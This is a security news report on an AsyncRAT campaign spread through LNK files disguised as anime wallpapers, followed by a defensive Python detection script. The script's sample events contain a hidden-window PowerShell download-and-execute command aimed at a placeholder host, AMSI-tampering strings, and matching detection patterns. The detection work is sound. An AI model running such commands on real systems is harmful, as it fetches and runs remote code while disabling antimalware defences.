A newly identified campaign, likely orchestrated by a Portuguese-speaking threat actor, is leveraging malicious shortcut (LNK) files disguised as wallpapers featuring popular anime characters. The campaign aims to deliver AsyncRAT by bypassing security measures and employing advanced obfuscation techniques.
The initial infection vector remains unidentified, but once a user executes the malicious LNK file it triggers a sequence of actions: the file runs an obfuscated PowerShell script, which retrieves a secondary payload from an external source and executes it in memory.
This payload then downloads additional files, including a batch script that ensures persistence and further malicious execution.

On analysing the campaign, researchers found that the filename ‘sasukewallpaper.ink’ was used to lure victims. Sasuke is a popular character in the Naruto anime series and has long been a fan favourite. While the wallpaper is displayed in the foreground, a script is downloaded in the background; this script deploys additional payloads on the system.
Security researchers found that the attack relies on sophisticated evasion techniques, including bypassing security mechanisms such as the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The malware utilises the publicly available ‘Null-AMSI’ tool to disable security defences in memory, preventing detection.

“A critical aspect of this campaign is its ability to bypass security mechanisms such as the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The campaign leverages the ‘Null-AMSI’ tool, which is publicly available on GitHub,” researchers explained.
The payloads are protected using AES encryption and GZIP compression, rendering them invisible to static analysis tools until decrypted dynamically. Furthermore, by executing scripts directly in memory rather than writing to disk, the campaign avoids leaving traces that could trigger security alerts.
The final stage of the attack installs AsyncRAT, which provides the attacker with full control over the compromised system. This RAT allows the threat actors to steal sensitive data, install additional malware, and execute remote commands.
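As an added defender-side example (not code from the report or the researchers), the Python below scores constructed Sysmon-style process-creation records for the chain described above: PowerShell launched from Explorer by a clicked shortcut, a download-and-execute-in-memory command line, AMSI/ETW tampering strings, and GZIP/AES unpacking. Field names follow Sysmon Event ID 1; the sample records, paths and URL are constructed.

```python
import re

# Indicator patterns for the stages the report describes. Two or more hits on
# one event are treated as an alert so that a lone "-nop" from an admin script
# does not page anyone on its own.
INDICATORS = {
    "encoded_or_hidden": re.compile(
        r"(?i)(?:-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass)"),
    "download_and_exec": re.compile(
        r"(?i)(?:DownloadString|DownloadData|Net\.WebClient).*(?:iex|Invoke-Expression)"
        r"|(?:iex|Invoke-Expression).*(?:DownloadString|DownloadData|Net\.WebClient)", re.S),
    "amsi_etw_tamper": re.compile(r"(?i)amsiInitFailed|AmsiScanBuffer|EtwEventWrite|AmsiUtils"),
    "packed_stage": re.compile(
        r"(?i)GZipStream|FromBase64String.*(?:Aes|RijndaelManaged|CreateDecryptor)", re.S),
}
# A double-clicked LNK makes Explorer (or cmd.exe for "cmd /c" targets) the parent.
SUSPICIOUS_PARENTS = {"explorer.exe", "cmd.exe"}

def score_event(event: dict) -> dict:
    """Return the indicator names matched by one process-creation event and a verdict."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if image == "powershell.exe" and parent in SUSPICIOUS_PARENTS:
        hits.append("powershell_from_shell")
    return {"hits": hits, "alert": len(hits) >= 2}

def triage(events: list) -> list:
    """Return (ParentImage, CommandLine, hits) for every event that alerts."""
    return [(e["ParentImage"], e["CommandLine"], score_event(e)["hits"])
            for e in events if score_event(e)["alert"]]

# Constructed records (not real telemetry): stage one, a benign scheduled task, stage two.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -ep bypass -c "iex (New-Object '
                    "Net.WebClient).DownloadString('http://example.invalid/stage2')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -c "$t=\'AmsiUtils\';$f=\'amsiInitFailed\';'
                    '$b=[Convert]::FromBase64String($blob);$d=$aes.CreateDecryptor();'
                    'New-Object IO.Compression.GZipStream($ms,0)"'},
]

if __name__ == "__main__":
    for parent, cmd, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT parent={parent} hits={hits}\n  {cmd}")
```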
Experts have cautioned users against downloading files, especially LNK shortcuts, from random websites on the Internet, and advised them to deploy antivirus, restrict PowerShell execution policies, and keep security software updated.